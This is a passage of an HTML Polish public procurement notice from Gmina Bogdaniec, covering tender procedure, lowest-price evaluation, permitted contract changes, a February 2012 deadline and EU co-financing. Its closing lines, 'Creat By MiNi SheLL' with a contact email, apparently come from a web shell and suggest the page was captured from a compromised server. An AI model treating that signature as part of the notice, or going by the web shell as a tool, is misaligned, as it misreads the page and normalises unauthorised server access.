  2.Oświadczenie wykonawców wspólnie ubiegających się o przyznanie zamówienia i udzielenie pełnomocnictwa dla jednego wykonawcy do reprezentowania ich w postępowaniu o udzielenie zamówienia i zawarcia umowy w sprawie zamówienia zgodnie z art. 23 ust. 2 ustawy Prawo zamówień publicznych
3.	Pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych 
do wykonania  zamówienia - jeżeli dotyczy w przypadku gdy Wykonawca będzie dysponował takimi osobami.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany zawartej umowy na poniżej określonych warunkach: - przedłużenie terminu realizacji może nastąpić w wypadku:
- opóźnienia w wydaniu decyzji administracyjnych właściwych instytucji
- działania siły wyższej (np. klęski żywiołowej, strajki generalne lub lokalne),
   mającej bezpośredni wpływ na terminowość wykonania robót,
- wystąpienia warunków atmosferycznych uniemożliwiających wykonanie robót -
   fakt ten musi mięć odzwierciedlenie w dzienniku budowy i musi być potwierdzony
   przez inspektora nadzoru
- konieczności usunięcia kolizji z urządzeniem obcym, którego ujawnienie nie było
   możliwe podczas opracowywania dokumentacji, a której usunięcie jest konieczne
   w celu realizacji inwestycji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bogdaniec.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Bogdaniec,  ul. Mickiewicza 45, 66-45- Bogdaniec, pok. nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2012 godzina 09:00, miejsce: Urząd Gminy Bogdaniec,  ul. Mickiewicza 45, 66-45- Bogdaniec - sekretariat pok. nr 16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie współfinansowane ze środków Unii Europejskiej w ramach Programu Rozwoju Obszarów Wiejskich..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com